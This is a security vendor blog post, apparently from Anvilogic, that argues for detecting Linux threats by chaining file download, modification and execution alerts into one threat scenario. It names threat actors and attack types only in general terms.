Find Gold in the Mundane: How Common Linux System Activity Reveal Hidden Insights
When simple user activities combine into one effective threat detection
The security community has made significant strides in understanding threat actor tactics, techniques, and procedures, but they alone aren’t enough to improve threat detection accuracy. To make sense of the noise we see in security monitoring, the sequencing of atomic-level identifiers achieves the resonance we need to produce high-fidelity detections. The Anvilogic Forge team continually looks for the sequencing of threat activity to build threat scenarios that aid in detecting adversary threat behaviors. We embrace the noise generated from an alert because it holds critical information that can be paired with another alert to produce something greater.
The “something greater” are threat scenarios. The power of threat scenarios is combining some essential activity with other threat identifiers to produce a sequence of activities worthy of investigation. One of the simplest examples of a threat scenario is on Linux, where we can unify detections for file download, file modification, and file execution. This complete scenario looks at the core behaviors needed to achieve file execution. In many security operation centers (SOC), those three individual activities for file download, modification, and execution alone could cause noisy, low-value detections. However, the beauty of a threat scenario is recognizing the value of those behaviors and their importance as a whole when paired with other threat indicators giving us a better chance to strike gold. These individual detections are better together as a scenario because it monitors the combination of the three activities and provides a high-fidelity alert since it captures the entirety of the malicious behavior. The threat scenario on its own tells a complete story needed for an analyst's investigation rather than needing to individually hunt three separate atomic-level indicators in large datasets.
The activity of file download, file modification, and file execution on Linux hosts can be indicators of potential threats. Scripts to install coinminers and backdoor malware have been found to utilize this sequence of activity. Threat actors, including APT36, TeamTNT, and Lorenz, are among those who are attributed to this type of activity. By monitoring these activities, organizations can quickly detect and respond to potential threats before they can do significant damage and compromise the integrity of their system.
Monitoring file download, file modification, and file execution on a Linux host is essential to maintaining a secure environment. When monitored properly, these three activities provide a golden opportunity to identify potentially malicious behavior that could compromise a system. The Anvilogic Forge is focused on identifying core threat behaviors to enhance the quality of detections customers have running in their network. The need for one detection meets attack criteria on its own; however, incorporating more atomic detections into the equation adds to the value of the detection immensely — being better together.